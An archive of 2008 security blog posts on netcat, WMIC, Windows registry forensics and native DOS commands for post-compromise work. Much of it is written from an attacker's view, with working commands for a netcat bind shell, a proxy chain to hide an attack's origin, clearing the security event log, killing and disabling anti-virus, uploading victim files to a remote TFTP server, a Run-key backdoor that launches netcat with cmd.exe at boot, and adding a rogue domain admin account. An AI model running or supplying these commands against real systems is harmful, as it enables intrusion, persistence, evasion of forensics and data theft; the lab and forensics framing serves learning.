Wednesday, March 26, 2008

Netcat The Almighty

I wrote this entry for a friend who showed some interest in fun tools to hack with. There are plenty of far superior guides on the web for him to refer to but this gave me the perfect opportunity to play with netcat and remind myself what a cool tool it really is.


Uses
In this post I will demonstrate how to use Netcat for the following:

  • Chat Client
  • Port Scanner
  • Banner Grabbing
  • File Transfer
  • Remote Shell & Backdoor
  • Proxy Chain




Syntax & Options

These options can be viewed on the command line by using nc -h

connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]





My Lab Setup

Computer A: 192.168.1.15

Computer B: 192.168.1.199

Computer C: 192.168.1.200


Chat client

To set up a chat session simply run one of the commands on each computer. This example tells netcat to listen hard (-L rather than -l) on port 5555, The second tells Computer B to connect to that session.


Computer A: nc -L -p 5555

Computer B: nc 5555


Anything that is typed into the DOS window will now be shown on the other screen.

Computer A


Computer B




Port Scanner

Using netcat as a port scanner is slow but it does do the job. In the example I have used netstat to show the listening ports on Computer A, and I have used netcat on Computer B to scan for open TCP ports between and including 130-140. The -w switch tells netcat to wait 2 seconds between each port and the -z switch tells netcat not to send any data. -u can be used to scan UDP ports.


Computer A: netstat -an | find /i "listen"

Computer B: nc -v -w 2 -z 192.168.1.15 100-140

Computer A


Computer B



Banner Grabbing

To use netcat to grab banners is also great fun, yes again there are better tools but netcat does the job too. In the example I use -v to tell netcat be verbose, and then i entered GET HTTP / HTTP/1.0 and pressed return twice.

Computer B: nc -v www.insecure.org 80

Computer B



If I had a list of IP's to test I could create a file of the IP Addresses called targets.txt and run netcat through a FOR loop to brab banners from each one. In the example below I have also directed a file called GetBanner.txt into netcat. This file would contain the GET HTTP / HTTP/1.0 and 2 returns.



File Transfer


In the example below Computer A is set up and waiting for a connection. anything it receives will go straight into the file on the end of the redirector in this case ThankYou.txt. Computer B very nicely sends a file to Computer A using another redirector, however I could have used an echo command to the same effect.

This method can be used to transfer any types of files such as images, executables, zip files etc....

Computer A: nc -L -p 5555 > ThankYou.txt

Computer B: nc 192.168.1.15 5555







Although not shown in the example above, by using -vv on the listening computer and sending computer you will see the status of the transfer.


Remote Shell & Backdoor

The following commands will create a remote shell on computer A and shovel it back to Computer B when it connects. By using -L the remote shell will remain accessible after disconecting. Using -l will close the shell after disconnecting.

Usually if an attacker was setting up a backdoor using this method he would use -d to detach the session after running the command. This way the backdoor would only be viewable by looking at the running processes.

Computer A: nc -L -e cmd.exe -p 5555

Computer B: nc 192.168.1.15 5555

Computer A


Computer B




Proxy Chain

This is kind of hard to show but If you have got through the rest of this it'll make sense I'm sure. Computer A is going to communicate to Computer C through Computer B. Why? Well just because I can.


Computer A: nc 192.168.1.199 -p 6666

Computer B: nc -p 6666 | nc 192.168.1.200 7777

Computer C: nc -L -e cmd.exe -p 7777


If I was to use a setup such as the above I could potentially use Computer C to attack other systems and if it was eventually traced it's log files would point to Computer B. Get the idea!


Well Ollie,that's all for tonight. I will very likely update this with some more advanced uses of the most fantastic netcat.

Sunday, March 23, 2008

Command-Line Ninjitsu

Recently I wrote a blog post about using some basic native DOS commands to extract information from a target PC about user accounts, shares, software, networking information etc...

What I didn't cover in that post was WMIC (Windows Management Instrumentation Command). If that previous post was say the equivelent of DOS Kung Fu then WMIC to me is the Ninjitsu of DOS.

The pupose of this post is to describe and list WMIC commands that can be used to derive information from a target, and that information could be useful to either a Sys Admin, a Malware Hunter or just a plain old Evil Attacker. As I will demonstrate WMIC can be used to modify settings also.

Used alongside the commands I listed in my earlier post on Command-Line Kung Fu, the commands listed here allow almost any operation via that simple DOS prompt with no additionally installed tools.


How to use WMIC

WMIC can be used interactively, by simply entering wmic at the command prompt, or non-interactively, by entering wmic followed by a command. I prefere the non-intercative method as it allows me to output to files easier or pipe the commands through a find command to filter my results. I do use the interactive WMIC shell if I'm just browsing around a remote system though as to allows me to set global variables (such as /node) which can be usefull.

WMIC commands are structured in the following way.

wmic [global_switch] [options] [format]

so for a simple example i might use:

wmic share list /format:table



To use a global switch I might use the /node switch to query a remote host.

wmic /node:192.168.1.1 share list /format:table

To view a complete list of available WMIC commands and switches simply use wmic /?



After finding the Global_Switch or Alias that i'm interested in I would use a command such as:

wmic volume /?



Or for the ultimate in output (but not in formating) try:

wmic /?:full



Output

The results of a WMIC query will by default go to STDOUT (the screen), however these can be output to a file using a couple of different options.

The /output option will output to a file:

wmic /output:c:\users.csv accountlist /format:csv


Or I can just use the greater than symbol to achieve the same:

wmic accountlist /format:csv > c:\users.csv


What I prefere about the second option using the > symbol is I can run the query to output to screen, if the output is as expected I can just simply bang a /format and >destination on the end of the command (i'm pretty lazy really!)


There are many options for the format of the output. I can view these by using the /? switch after the format command:

wmic share list /format /?



I can also choose to output only specific information if the normal output is to verbose by using the get clause. For example I might just want to list the IP Addresses on the network cards so I might use:

wmic nicconfig get description, ipaddress



If the output is what i want i then simple use the up arrow on the keyboard to repopulate the line and put my format and output file on.

wmic nicconfig get description, ipaddress /format:htable >nic_addresses.html



Finally one last ouput option I have come across on various websites is using the /record switch. This can only output to xml format but is very useful for recording the command typed, who ran the command, the output and the date. The resulting XML file can then be opened and viewed in Word.

wmic /record:nic.xml nicconfig get description, ipaddress





WMIC Commands

Okay, so now I have explianed a few of the basics of WMIC i'll get down to the fun stuff.


Remote Enumeration
Running WMIC without passing the /node: option will perform the query on the local machine. I could also run commands on remote machines in another domain (labnet in this example) by using the /user:"LABNET.CO.UK\Administrator" /password:"letme1n" options. An example of running a WMIC query on a remote machine in another Domain to get a user list may look like this:

wmic /user:"LABNET.CO.UK\Administrator" /password:"letme1n" /node:192.168.1.10 useraccaount list full


Or to use WMIC on multiple remote targets (assuming you have valid credentials) you could use the following:

wmic /node:@"c:\pclist.txt" volume get capacity, driveletter /format:htable >disk.html


With that out the way the examples that follow are all run locally. Some Examples I list the command to output to a file, others I will just list the output to screen.



Users
wmic /output:c:\users.html useraccount list full /format:hform

This gives me valuable information that the "net user" command doesn't, such as the SID which helps identify those renamed Administrator accounts.

Also dont forget the the sysaccount alias for those built-in accunts and groups


Groups
wmic group list full /format:hform >groups.html

This will list both local and global groups.


Shares
To list all the shares including hidden I would use:

wmic share list


Processes
To list the full details of the running processes and output the results to a file I might use:

wmic /output:c:\processes.html process list full /format:hform


Slightly easier format to read might be:

wmic /output:c:\processes.html process list full /format:htable


Or to filter out some of the utput I might pipe the results though a find command:

wmic process list brief | find "cmd.exe"



After listing the process information I might use the following command to Kill a processes by it's PID:

wmic process 2324 delete


or by it's name:

wmic process where name='cmd.exe' delete


Or if I want to display the processes and have the results update every 2 seconds I might use:

wmic process list brief /every:2


Services
To list the services that are configured to run at startup I might run the following.

wmic service list full /format:htable >service.html

Or to filter on just the running services that are set to startup automatically I might use:

wmic service list brief | find /i "running | find /i "auto"





Software
I might want to list the software that is installed. To do this I might use:

wmic os list full /format:hform >os.html


Service Packs and Hotfixes -qfe (Quick Fit Engineering) will list which service packs and hot fixes are installed.

wmic qfe


I can output this to a nicely formated file using the command below:

wmic /output:c:\qfe.html qfe list full /format:htable


EventLogs
Event logs are important to both the Forensic Investigator and the Attacker. A forensic Investigator might want to use WMIC to copy the logs off the Victim PC by using thefollowing command:

wmic nteventlog where "Logfilename = 'System'" Call BackupEventLog "c:\systemlog.evt"


Okay, so how might an attacker use WMIC to make forensics more difficult? Well they might erase event logs.

wmic nteventlog where "logfilename = 'security'" call cleareventlog


And then to confirm that the log is erased the attacker might simply list the size ofthe log using:

wmic nteventlog list brief





Network Settings
When enumerating a target I can use WMIC to produce some output on the targets network settings. The Network card configuration is always useful to have. The command below gives me a nicely formated file with all the network card settings.

wmic /output:c:\nics.html nicconfig list /format:hform

This will list all the cards and the index numbers. From here I can identify a card and then maybe adjust the settings, dns for example.


wmic nicconfig where index=4 call enablestatic("192.168.1.10"), ("255.255.255.0")


wmic nicconfig where index=4 call setgateways("192.168.1.1")


wmic nicconfig where index=4 call setDNSserversearchorder ("192.168.1.100", "192.168.1.101")


Or to set the interface back to DHCP i would use:

wmic nicconfig where index=4 call enabledhcp


Startup
If hunting malware on a PC I might want to take a good look at what is going to be set to startup. The following command will list all those details and output it to a nicely formatted file.

wmic startup list full /format:htable >c:\startup.html





Starting and Stopping Applications
After listing running services and processes as shown earlier an attacker may use WMIC to stop AV software before running his evil program.


To stop an application, such as an anti-virus program:

wmic process where name="ashserv.exe" call terminate


To start an application:

wmic process call create "C:\evilprogram.exe"


And if I wanted to make sure the AV didn't start automatically I might use:

wmic service where caption="avast! Antivirus" call changestartmode "Disabled"





Update - 05-01-09

Enable Remote Desktops With WMI

Thanks to a comment left by Netcowboy I discovered that WMIC under Windows Server 2003 has many additional options than WMIC under XP. One really useful option for me was the RDToggle command.

To check if a remote server has remote desktops enabled use:

wmic /node:"servername" RDToggle where servername="servername" get AllowTSConnections

Remote Desktops is disabled.if the response is 0.

To enable remote desktops use:

wmic /node:"servername" RDToggle where servername="servername" call SetAllowTSConnections 1

Both of these commands assume you have the correct privileges on the remote server to run these commands. if not use the /user and /password switches.

If you wanted to enable remote desktops from XP use the following instead:

wmic /node:servername path Win32_TerminalServiceSetting where AllowTSConnections=0 call SetAllowTSConnections 1



Useful Links for WMIC

http://technet.microsoft.com/en-us/library/bb742610.aspx
http://waynes-world-it.blogspot.com/search/label/WMI
http://www.vedivi.com/blog/2008/05/how-to-enable-remote-desktop-programmatically/



I'll update this post with any new interesting things that I find to do using WMIC because i have a feeling I have just scratched the surface here.



Wednesday, March 12, 2008

Finding Traces of Executables in the Registry

I found a registry key that is really quite interesting and I can see how it might come in handy when looking at a system that may have been compromised.

By following the procedure detailed below I was able to quickly find all programs or executables that have been installed or executed on a system by the logged in user.

These values are stored in clear text and are very simple to retrieve.


Tools

  • Reg (windows XP native command)
  • excel or any other spreadsheet

Steps

1. Im using a Windows XP SP2 system here. From a DOS prompt I execute the following command:

reg query HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE > outputfile.txt
The results are ouyput to a file called output.txt and stored inthe current directory.


2. Import into the file into excel and using auto filters Filter out all lines begining with @. You are left with a list of programs that have at some stage been installed and used.



As can be seen from the output there are several files listed that are just executables and have no installer. BAT files are also listed if they have been run. Also listed is the location from which the executable was run.




If you are interested in other ways to get the most of the registry I totally recommend Harlan Carvey's book "Windows Forensics and Incident Recovery ".

After writing this entry I found from Harlan thaty he had previously blogged on this registry key. In his blog Harlan goes into great detail about this. I link to his post here.



Saturday, March 8, 2008

Tcpdump Post Update

I have been real busy this week reading Richard Bejtlich's "The Tao of Network Security Monitoring". I have found this to be a fantastic read and Richard's explanations of protocols and monitoring tools such as Tcpdump, Tethereal (now tshark) and Snort are enlightening.

The book takes the reader through the various ways to configure an environment to perform packet capture, and then on to how to analyse the captures and interpret the data using open source tools.

I strongly recommend the book to anyone who, like me, is interested in network traffic or network monitoring.


Rather than put out a new post this week I will update my older post "Fun with Tcpdump" with some of the things I have learned from the book.


SynJunkie

Sunday, March 2, 2008

Command-Line Kung Fu

Often after gaining access to a host an attacker will need to gather information about the host and the network. If you have a VNC or RDP session to the compromised host this is easy enough, however if you only have a DOS prompt this can be slightly more fun. This can be even more challenging if those DOS tools available to you are the ones that are native to the OS on the compromised host.

The purpose of this post is to list a few of the native DOS commands that I find useful to use when i have a DOS prompt on a Windows Host. Please note, these commands have been tested on XP but most will work on Server 2003 and Windows 2000 also.


It's useful to note that output from most DOS commands can be output to a text file using the > filename command.

tree >filestructure.txt

Okay lets get started.


Sections
I have split this post down into the following sections.
  • Host Enumeration
  • Network Enumeration
  • Modification
  • Scanning
  • Maintaining Access
  • Further Exploration

Host Enumeration

In this section I want to learn as much as I can about the compromised host.

IPCONFIG
"ipconfig /all" can be used for viewing the IP information on the victim. This is useful as it gives the addresses of DNS servers, Wins servers and the gateway. These are potentially other targets.

ipconfig /all



NETSTAT
Netstat is useful for looking at what ports the victim has open and what connections it is making to other hosts. Although in I have put this inb the host enumeration section the information gained here will be valuable for network enumeration. Netstat can be used with a multitude of switches, each reveal different information. I'll cover the switches I find most useful.

netstat -anbv


This will list all connections,the executables involved in those connections and
To quickly list connections that are active pipe netstat through the find command:

netstat -an | find /i "established"


NET
The net command provides a great deal of information that is of use to an attacker. In particular for host enumeration "net share", "net session", "net use", "net start" and "net stop".

Net Share
net share "net share" can be used for creating new shares and is useful for identifying what folders the victim is already sharing. It will show hidden and non-hidden shares.

net start
net start This will list all services that are started. It will give you an idea of the roll of the victim host and tell you what AV or syslog software is running. services can be stopped using "net stop service_name".



Net Session

net session This is a great command for if you find yourself on a session to a server. It will list all the users that are connected (by username) and the PC names.


Note: if I wanted to quickly obtain the IP Addresses of the connected PC's for a script or something, I might use "nbtstat -S"


Net Accounts

"Net accounts" will list the details of the account policy that is enforced on the host, be it the default one or one pushed down from a domain controller. The information here is very useful as you can see it displays the account lockout policy and the lockout duration etc..

net accounts


NETSH
netsh can be used to dump out info about the network, firewall and connections.

netsh diag show all /v

The output from the above command is very verbose. To identify just the fields that have properties use the /p switch.

If you wanted to view the firewall configuration you could use:

netsh firewall show conf

Or If you want to see the config of the open ports through the firewall you can use the following command:

netsh firewall show port

As you can see the "netsh" command is very powerfull, I'll come back to it in the "Maintaining Access" section later.


GPRESULT
If the victim is a member of a domain the the "gpresult" will tell you what groups he and his computer are a member of, which group policies are applied and information about the OS.

gpresult


SET
Also just typing "set" will display some useful information such as the system variables (logon server, workstation name etc...) and the system paths.

set

DIR
"dir /s" will list all the directories and sub-directories. If you are looking for something in particular such as spreadsheets you can use "dir /s *.xls" or to also include possible password files use "dir /s *.xls password*.*"

dir /s password*



To look for additional tools use the "dir /s *.exe" command from the root directory. The PC may have had Resource Kits installed which often provide some excellent tools. Also dont forget the /a: switch to specify files with special attributes, such as hidden files.

dir /s /a:h


Type
Type can be used to output a file to the screen. used in conjuction with "find" you can look for particular words in files.

type *.* | find /i "bank"


ROUTE
This will identify all network adapters and list connected subnets and routes. It also lists which adapters are which, this can be useful for adjusting settings using the "netsh" command.

route print

Routes can also be modified from the "route" command.


Network Enumeration

If the comprimised host is a connected to a network the commands listed below will help enumerate that network.


NET

"net view" is great for network enumeration.

"net view" will list all the hosts on the compromised hosts domain. "net view /domain" will list the domains that the compromised host can see. "net view /domain_name" will list the hosts on another domain.

Using the servername or host name will display all the shared resources (shares and printers) on the remote host. This will not show hidden shares though.

net view \\servername

net localgroup & net group
"net localgroup /domain" will list all the local groups on the domain. To view the members of a local group insert the groupname. Below are examples of using these commands to view the members of administrative groups and to find a list of all users. To an attacker who wants to compile a user list for password attacks this is critical information

net localgroup /domain


To view the members of a group you can specify the group name.

net localgroup administrators /domain

"net group /domain" will list all the Global groups on the domain. To view the members of a global group insert the groupname.

net group /domain


net group "domain admins" /domain

The command above will display the members of the global group "Domain Admins". As shown, I have now located a user in the "Domain Admins" group that I may want to target.

Below is another example of using the net group commands to enumerate all users on the domain.



NETSH
Another method I have found for enumerating all domain users is using the netsh command. I have found that I can run this on a remote Domain Controller even from an unprivileged account with no local or domain administrative rights.

netsh -r {ipaddress-of-remote-target} dump >textfile.txt

This will create a text file in the directory the command is run fron and under the "RAS Configuration" section all users will be listed. This output can easily be manipulated to give you a comprehensive user list and if telephone numbers have been configured it will list these also. Interesting!


ARP
looking at the arp cache will show you what computers the host has recently communicated with on the network. Then using "net view \\computername" will show you what shares that host has. I'm betting if your looking to hop onto another host and map drives these are good starting points because you host most likely has some level of access.

arp -a



And don't forget ipconfig either for recent connections.

ipconfig /displaydns

TREE
After creating a drive mapping to another computer (net use * \\servername\share" and changing to it, if you run the tree command it will list all the directories that you have access to. Another method is to use "dir /s" but tree has lines and it looks funky.

tree /f


Modification

An attacker may want to modify data on the compromised host, data such as log files or web pages etc....

There is a good little text editor that has been native to windows for many years called Edit. Edit is an interactive DOS based text editor with some great features.

edit passwords.txt

This is a great tool for whipping up a batch file and saving it on the host in the startup folder. Or for creating username lists and password lists to run with "net use" command in a FOR loop.

An attacker may also attempt to view or edit the logfiles in %systemroot%system32/logfiles

ECHO
echo can be used to create files or to input values into files.

echo hello > filename.txt


Scanning

To my knowlegde there are no port scanning tools that are native to XP or Windows 2003. There is one that comes in the resouce kit called portqry.exe so it may be worth a quick seach of the harddisk for that.

So what do we have?

NBTSTAT
Nbtstat is pretty good, although we can only scan one host at a time it does reveal some useful information.

nbtstat -A 192.168.1.10

This will show listening services on remote machine. Admitedly, it's not a great scanner but it does a bit.
What the key is here is to learn what the codes are for the services. For example some of the codes are listed below. Remember, google is your friend.


TELNET
If you locate a port that is open and you want to see if you can grab a banner you could use Telnet

telnet ip-address 80

type "get" and return twice

Although this does tell me the port is open and a web server is listening I can get more information by typing "GET / HTTP/1.0" after I have established a telnet connection.

After pressing return a few times you may get the banner revealing what web server version is running.

Telnet is great for enumerating mail servers also. Mail can even be sent using telnet so theres plenty of fun to be had there.


Maintaining Access

TFTP
If you want to get tools onto the host and you have a TFTP server that you can reach use the "tftp" command.

tftp -i ip-address-of-tftp-server get toolname.exe

Or to upload files from the victim to a remote server use:

tftp -i ip-address-of-tftp-server put filename-to-upload.txt


NETSH
To allow a program to listen through the firewall:

netsh firewall add allowedprogram C:\nltest.exe mltest enable

To open a port on the firewall:

netsh firewall add portopening tcp 2482 lt enable all


REG
The reg command is useful for both viewing the registry and adding keys to it. Here's how to view the contents of a subkey or add a key. The example below shows how an attacker may add a backdoor to your system

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v listener /d "C:\Windows\System32\nc.exe -p 6666 -L -d -e cmd.exe"



Then I would re-run "reg query" to verify my update.



Now next time the compromised hosts reboots i'll have a remote command shell waiting for me.

NET
So once an attacker is on a victims PC he may want to add an account so he can get back on if the user changes her password. Using the "net" command here's how it would be done using "net user".

net user synjunkie GoodPassword123 /add

Next the account is added to the Administrators group with the "net localgroup" command.

net localgroup Administrators synjunkie /add

On a Server the command an attacker may use to add his user account to an administrative group might be:

net group "domain admins" synjunkie /add


Further Exploration


As we have had a look around the comprimised host and have lookedat what the host is attached to we may want to start looking at whats on other hosts. again we use the "net" command to map drives and explore further.

net use
net view \\w2k3-srv/
net use * \\w2k3-srv/i386
net use
Z:

Once a share is found that I can read and write to I might leave a file there that might look intersting to someone "britney and Paris caught in the act.jpg" or "payroll-update.xls". If I can get somone to open such a file maybe I can comprimise their machine and the whole process begins again. It doesn't have to be an admin, as long as the victims have access to the data I want as an attacker thats all I need.